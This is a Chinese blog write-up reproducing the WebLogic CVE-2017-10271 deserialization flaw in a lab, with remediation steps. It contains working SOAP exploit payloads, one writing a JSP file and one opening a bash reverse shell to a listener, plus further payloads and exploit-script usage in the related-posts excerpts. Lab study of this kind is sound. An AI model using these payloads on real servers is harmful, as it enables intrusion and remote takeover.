CVE-2017-10271漏洞复现

最新推荐文章于 2024-04-06 15:08:32 发布
最新推荐文章于 2024-04-06 15:08:32 发布
阅读量4.9k 收藏 13
点赞数 1
分类专栏: 漏洞复现 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_36594628/article/details/119142191
版权

CVE-2017-10271复现

一、启动环境

​ 靶机:ubantu20.04 IP:192.168.3.115

​ 攻击机:win10 IP:192.168.1.238

​ 在ubantu 20.04 搭建 Vulhub 环境中已经介绍了怎么启动环境。

二、漏洞信息

​ WebLogic WLS组件中存在CVE-2017-10271远程代码执行漏洞,可以构造请求对运行WebLogic中间件的主机进行攻击,近期发现此漏洞的利用方式为传播挖矿程序。

(一)、漏洞描述

​ 在了解CVE-2017-10271之前我们先了解一下什么是WebLogic。

	注:来源于百度词条

​1、什么是WebLogic

​	WebLogic是没过Oracle公司出品的一个application server,确切的说是一个基于JAVAEE架构的中间件,WebLogic是用于开发、集成、部署和管理大型分布式的WEB应用、网络应用和数据库应用的Java应用服务器。将Java的动态功能和JavaEnterorise标准的安全性引入大型网络应用的开发、集成、部署和管理之中。  

​2、WebLogic有什么优势?

​	1.标准

​		对于业内多种标准的全面支持,是WEB应用系统的实施更为方便,同时也使基于标准的解决方案的开发更简便。  

​	2.可扩展性

​		以高扩展的架构体系闻名业内,包括客户机连接的共享、资源pooling以及动态页面和EJB组件集群。

​	3.快速开发

​		凭借对EJB和JSP的支持,以及Servlet组件架构体系,可加速投放市场速度。开放性标准与WebGain Studio配合时,可简化开发,并可发挥已有的技能,迅速部署应用系统  

​	4.更趋灵活

​		与领先的数据库、操作系统和Web服务器紧密集成。

​	5.可靠性

​		容错、系统管理和安全性已在全球数以千计的关键任务环境中得以验证。

​	6.体系结构
(二)、影响版本

​ 10.3.6.0, 12.1.3.0, 12.2.1.0, 12.2.1.1 , 12.2.1.2

(三)、漏洞解析

​ 漏洞触发位置:wls-wsat.war。

​ 漏洞触发url:/wls-wsat/CoordinatorPortType(POST)。

​ 漏洞本质:主要是由于wls组件使用了webservice来请求soap请求,所以通过构造SOAP(XML)格式的请求,在解析的过程中导致XMLDecoder反序列化漏洞,可导致执行任意命令。

在weblogic.wsee.jaxws.workcontext.WorkContextServerTube.processRequest方法中,当localHeader1和localHeader2都不为null时,将会把<work:WorkContext>所包含的数据传入weblogic.wsee.jaxws.workcontext.WorkContextTube.readHeaderOld方法。在此方法中,对WorkContextXmlInputAdapter类进行了实例化,并调用WorkContextXmlInputAdapter类的构造方法,通过XMLDecoder()进行反序列化操作。
这里的<work:WorkContext>是最关键的。

​ 摘抄自缝缝补补的WebLogic:绕过的艺术

​ 扩展:

​ SOAP:SOAP是Web服务安全性内置协议,采用保密和身份验证规则集的方式,支持OASIS和W3C制定的标准,结合使用XML加密、XML签名和SAML令牌等方式来验证身份和授权。SOAP更安全,适合于处理敏感数据,但是比较笨重。

(四)、漏洞复现

​ 由于靶场的ip为192.168.3.115,所以访问192.168.3.115:7001。当页面返回下图时证明访问环境搭建成功。

在这里插入图片描述

​ 由于触发url为/wls-wsat/CoordinatorPortType,访问http://192.168.3.115:7001/wls-wsat/CoordinatorPortType。

在这里插入图片描述

​ 这里拦截数据包,发现是一个GET请求的,这里需要将GET请求更改为POST请求change request method,同时插入构造的soap请求。

在这里插入图片描述

​ soap POC:

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
<soapenv:Header>
    <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
        <java><java version="1.4.0" class="java.beans.XMLDecoder">
            <object class="java.io.PrintWriter">
           <string>servers/AdminServer/tmp/_WL_internal/bea_wls_internal/9j4dqk/war/test.jsp</string>
                <void method="println">
                    <string>
                        <![CDATA[
                            <% out.print("test"); %>
                        ]]>
                	</string>
                </void>
                <void method="close"/>
            </object></java></java>
    </work:WorkContext>
</soapenv:Header>
<soapenv:Body/>
</soapenv:Envelope>

​ 上传成功

在这里插入图片描述

​ 反弹shell

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
    <soapenv:Header>
        <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
            <java version="1.4.0" class="java.beans.XMLDecoder">
                <void class="java.lang.ProcessBuilder">
                    <array class="java.lang.String" length="3">
                        <void index="0">
                            <string>/bin/bash</string>
                        </void>
                        <void index="1">
                            <string>-c</string>
                        </void>
                        <void index="2">
                            <string>bash -i &gt;&amp; /dev/tcp/192.168.3.125/21 0&gt;&amp;1</string>
                        </void> #/dev/tcp/监听机的ip/监听的端口
                    </array>
                    <void method="start"/>
                </void>
            </java>
        </work:WorkContext>
    </soapenv:Header>
    <soapenv:Body/>
</soapenv:Envelope>

在这里插入图片描述

(五)、修复建议

1.临时解决方案
根据攻击者利用POC分析发现所利用的为wls-wsat组件的CoordinatorPortType接口,若Weblogic服务器集群中未应用此组件,建议临时备份后将此组件删除,当形成防护能力后,再进行恢复。
根据实际环境路径,删除WebLogic wls-wsat组件:
rm -f /home/WebLogic/Oracle/Middleware/wlserver_10.3/server/lib/wls-wsat.war
rm -f /home/WebLogic/Oracle/Middleware/user_projects/domains/base_domain/servers/AdminServer/tmp/.internal/wls-wsat.war
rm -rf /home/WebLogic/Oracle/Middleware/user_projects/domains/base_domain/servers/AdminServer/tmp/_WL_internal/wls-wsat
重启Weblogic域控制器服务:
DOMAIN_NAME/bin/stopWeblogic.sh #停止服务
DOMAIN_NAME/bin/startManagedWebLogic.sh #启动服务
删除以上文件之后,需重启WebLogic。确认http://weblogic_ip/wls-wsat/ 是否为404页面。
2.官方补丁修复
前往Oracle官网下载10月份所提供的安全补丁
http://www.oracle.com/technetwork/security-advisory/cpuoct2017-3236626.html
升级过程可参考:
http://blog.csdn.net/qqlifu/article/details/49423839
摘抄自XML Decoder反序列化漏洞(CVE-2017-10271)

E耳双S
关注
  • 1
    点赞
  • 13
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
Weblogic WLS组件REC漏洞(CVE-2017-10271)利用脚本
09-30
Weblogic wls-wsat组件反序列化漏洞(CVE-2017-10271)利用脚本。 命令执行并回显 直接上传shell 在linux下weblogic 10.3.6.0测试OK 使用方法及参数 python weblogic_wls_wsat_exp.py -t 172.16.80.131:7001 usage: weblogic_wls_wsat_exp.py [-h] -t TARGET [-c CMD] [-o OUTPUT] [-s SHELL] optional arguments: -h, --help show this help message and exit -t TARGET, --target TARGET weblogic ip and port(eg -> 172.16.80.131:7001) -c CMD, --cmd CMD command to execute,default is "id" -o OUTPUT, --output OUTPUT output file name,default is output.txt -s SHELL, --shell SHELL local jsp file name to upload,and set -o xxx.jsp
CVE-2017-12615-master.zip
09-04
CVE-2017-12615漏洞利用工具;CVE-2017-12615漏洞利用工具;
【网络安全---漏洞复现】Tomcat CVE-2020-1938 漏洞复现和利用过程
最新发布
m0_60607371的博客
04-06 996
python2 ‘Tomcat-ROOT路径下文件读取(CVE-2020-1938).py’ -p 8009 -f /WEB-INF/web.xml 192.168.31.160。
weblogic CVE-2017-10271修复教程
飞乐鸟的博客
10-30 2195
1.简介 CVE-2017-10271是weblogicwls-wsat组件的一个xml反序列化漏洞,可造成远程命令执行。更详细分析可见参考链接,本文强调在进行参考链接修复中的一些细节。 2.影响版本 OracleWebLogic Server10.3.6.0.0 OracleWebLogic Server12.1.3.0.0 OracleWebLogic Server12.2.1.1.0 OracleWebLogic Server12.2.1.2.0 打了B25A及其之前版本的补丁都没用,..
CVE-2017-10271 WebLogic XMLDecoder反序列化漏洞
weixin_45694388的博客
07-09 5169
漏洞产生原因: CVE-2017-10271漏洞产生的原因大致是Weblogic的WLS Security组件对外提供webservice服务,其中使用了XMLDecoder来解析用户传入的XML数据,在解析的过程中出现反序列化漏洞,导致可执行任意命令。攻击者发送精心构造的xml数据甚至能通过反弹shell拿到权限。 涉及版本: 10.3.6.0.0 12.1.3.0.0 12.2.1.1.0 12.2.1.2.0 环境搭建: vulhub 工具利用: 检测: 工具:weblogicScanner
weblogic反序列化漏洞CVE-2018-2628-批量检测脚本
weixin_34357436的博客
04-21 644
#coding=utf-8 import socket import time import re,os,sys,codecs type = 'utf-8' reload(sys) sys.setdefaultencoding(type) IpFile=file('./weblogic1.txt') #IP列表 fp= codecs.open("./weblogic1_...
CVE-2017-10271复现
qq_56258713的博客
07-03 3004
CVE-2017-10271复现
【网络安全---漏洞复现】Weblogic XMLDecoder 反序列化漏洞CVE-2017-10271
m0_67844671的博客
09-13 489
Weblogic XMLDecoder 反序列化漏洞CVE-2017-10271);​ Weblogic的WLS Security组件对外提供webservice服务,其中使用了XMLDecoder来解析用户传入的XML数据,在解析的过程中出现反序列化漏洞,导致可执行任意命令。
CVE-2017-10271(WebLogic XMLDecoder反序列化漏洞)
deginner2的博客
07-29 4776
CVE-2017-10271(WebLogic XMLDecoder反序列化漏洞)
weblogic CVE 2017-10271
ChenD的学习笔记
05-22 1570
将输出重定向到当前循环的Branding_Login_WeblogicConsole.gif文件的同级目录下的pwd.txt文件,因为可以访问到该图片,所以能访问到创建的文件。这里随便找一个可访问的文件,访问192.168.27.128:7001/console,进入到登陆页面,右键查看源代码,随便找一个图片或文件的链接,这就搞到了可访问的文件名。这条命令的意思是,找到所有叫Branding_Login_WeblogicConsole.gif的文件,循环读取,每次循环 执行 id;ifconfig命令,
CVE-2017-7269-Echo-PoC:CVE-2017-7269回显PoC,用于远程入侵检测。
03-02
我们团队对此次发布CVE-2017-7269漏洞的分析报告: ://ht-sec.org/cve-2017-7269-vulnerabilities/ DefaultPoC只能弹calc.exe ,现在修改成可以响应请求,命令格式为: CVE-2017-7269_remote_echo.py ip_address...
Weblogic XMLDecoder 远程代码执行漏洞 CVE-2017-10271 漏洞复现
Boom!脑洞大爆炸的博客
11-11 1226
Weblogic XMLDecoder 远程代码执行漏洞 CVE-2017-10271 漏洞复现
【weblogic漏洞复现CVE-2017-10271+CVE-2020-14882远程命令执行漏洞+CVE-2018-2894任意文件上传漏洞+CVE-2018-2628反序列化远程代码执行漏洞
serendipity1130的博客
09-01 2937
1.CVE-2017-10271 漏洞成因: 由WebLogicServerWLS组件远程命令执行漏洞,主要由wls-wsat.war触发该漏洞 触发漏洞url如下: http://192.168.225.139:7001/wls-wsat/CoordinatorPortType post数据包,通过构造SOAP(XML)格式的请求,在解析的过程中导致XMLDecoder反序列化漏洞。 1.扫描到端口号为:7001,进行访问。 nmap192.168.225.138-sV-sC-P
Weblogic(CVE-2017-10271)与 Struts2(s2-045) 反序列化漏洞复现
qq_45953122的博客
09-11 307
Java反序列化漏洞复现
Weblogic XMLDecoder(CVE-2017-10271)反序列化漏洞复现
qq_40624810的博客
03-11 319
一、原理 Weblogic WLS 组件中存在XMLDecoder远程代码执行漏洞,可以构造请求对运行WebLogic中间件的主机进行攻击 原理:该漏洞产生于WLS-WebServices这个核心组件中,因为它使用XMLDecoder来解析XML数据,直接构造payload,发送xml数据,即可利用该漏洞,上传webshell等等。 二、漏洞版本 10.3.6.0.0,12.2.1.1.0,12.2.1.2.0,12.1.3.0.0 三、漏洞搭建: 判断:通过中间件去判断 端口+/wls.
cve-2017-10271漏洞复现
06-28
### 回答1: CVE-2017-10271漏洞是Oracle WebLogic Server中的一个远程代码执行漏洞。攻击者可以通过发送特制的HTTP请求来利用该漏洞,从而在受影响的系统上执行任意代码。该漏洞已经被公开披露,并且已经有一些工具可以用来复现漏洞。但是,我们不建议未经授权的人员进行漏洞复现,因为这可能会导致系统被攻击者入侵。如果您需要测试您的系统是否受到该漏洞的影响,请咨询安全专家或厂商提供的安全补丁。 ### 回答2: CVE-2017-10271漏洞是Oracle WebLogic Server的一个远程代码执行漏洞,攻击者可以通过构造特定的HTTP请求来向受影响的WebLogic服务器发送恶意代码,在未经授权的情况下执行任意命令或获取服务器操作权限。 漏洞复现需要以下步骤: 1. 确定漏洞影响的WebLogic版本,CVE-2017-10271漏洞影响的版本为12.1.2.0、12.1.3.0、12.2.1.0、12.2.1.1和12.2.1.2,若WebLogic版本符合以上版本则可以进行后续漏洞复现操作。 2.通过漏洞利用工具Metasploit或手工构造特定的HTTP请求向受影响的WebLogic服务器发送恶意代码,触发漏洞,远程代码执行。 3.构造特定的HTTP请求需要以下信息: - 目标WebLogic服务器的IP地址和端口号。 - WebLogic管理员账户的用户名和密码,用于获取控制台访问权限。 - 漏洞利用代码,用于构造HTTP请求并发送到目标WebLogic服务器。 其中,漏洞利用代码结构大致如下: POST /wls-wsat/CoordinatorPortType HTTP/1.1 Host: target_weblogic_server_ip:target_port Content-Type: text/xml; charset=utf-8 Content-Length: 800 <?xml version="1.0" encoding="UTF-8"?> <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> <java version="1.8.0_131" class="java.beans.XMLDecoder"> <void class="java.lang.ProcessBuilder"> <array class="java.lang.String" length="3"> <void index="0"> <string>/bin/bash</string> </void> <void index="1"> <string>-c</string> </void> <void index="2"> <string>echo "";whoami;id;uname -a;echo "> /tmp/shell;sudo chmod 777 /tmp/shell;/tmp/shell</string> </void> </array> <void method="start"/> </void> </java> </work:WorkContext> </soapenv:Header> <soapenv:Body/> </soapenv:Envelope> 这段代码用于请求WebLogic服务器上的CoordinatorPortType服务,执行恶意代码,获取远程服务器的操作权限。其中,</string>字符串后面的内容是要在目标服务器上执行的命令。 4.成功复现漏洞后,攻击者可以通过远程命令执行获取服务器操作权限,对受影响的服务器进行攻击、篡改或窃取敏感数据等恶意行为。 因此,WebLogic管理员应当及时采取措施,升级至最新版本,关闭不必要的端口,增强安全性,以保护WebLogic服务器不受恶意攻击。 ### 回答3: CVE-2017-10271是一个Oracle WebLogic Server中的远程执行代码漏洞漏洞影响Oracle WebLogic Server 10.3.6.0、12.1.3.0、12.2.1.1和12.2.1.2版本。 漏洞复现步骤如下: 步骤一:下载漏洞复现工具 首先要下载漏洞复现工具weblogic-CNVD-2019-48814: git clone https://github.com/tdy218/OracleWeblogic-CNVD-C-2019-48814.git 步骤二:搭建漏洞环境 安装Oracle WebLogic Server 12.2.1.3.0,安装过程略过。在安装完成后,启动Oracle WebLogic Server管理服务: ${ORACLE_HOME}/user_projects/domains/base_domain/bin/startWebLogic.sh 启动管理服务后,访问http://localhost:7001/console,进入控制台界面,输入管理员账号密码,进入控制台主页。 步骤三:运行漏洞利用脚本 进入weblogic-CNVD-2019-48814目录,运行poc.py脚本,如下所示: python poc.py http://localhost:7001 begin ${arbitary command} 其中,http://localhost:7001是WebLogic Server地址,${arbitary command}是任意需要执行的命令,例如: python poc.py http://localhost:7001 begin ls 上述命令将列出当前目录下的文件列表。 漏洞利用成功后,可以看到攻击者执行的命令结果。 除了使用上述脚本之外,攻击者还可以手动利用该漏洞,具体步骤可以查看漏洞详情。 总结: CVE-2017-10271漏洞是一种影响Oracle WebLogic Server的远程执行代码漏洞,攻击者可以利用该漏洞在目标服务器上执行任意命令。为了防止该漏洞的攻击,我们可以进行以下措施: 1. 及时升级Oracle WebLogic Server版本,以防止攻击者利用漏洞; 2. 禁用T3协议,仅允许HTTPS连接; 3. 配置防火墙,限制WebLogic Server管理服务的访问来源; 4. 运行安全软件,及时发现漏洞和攻击行为。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值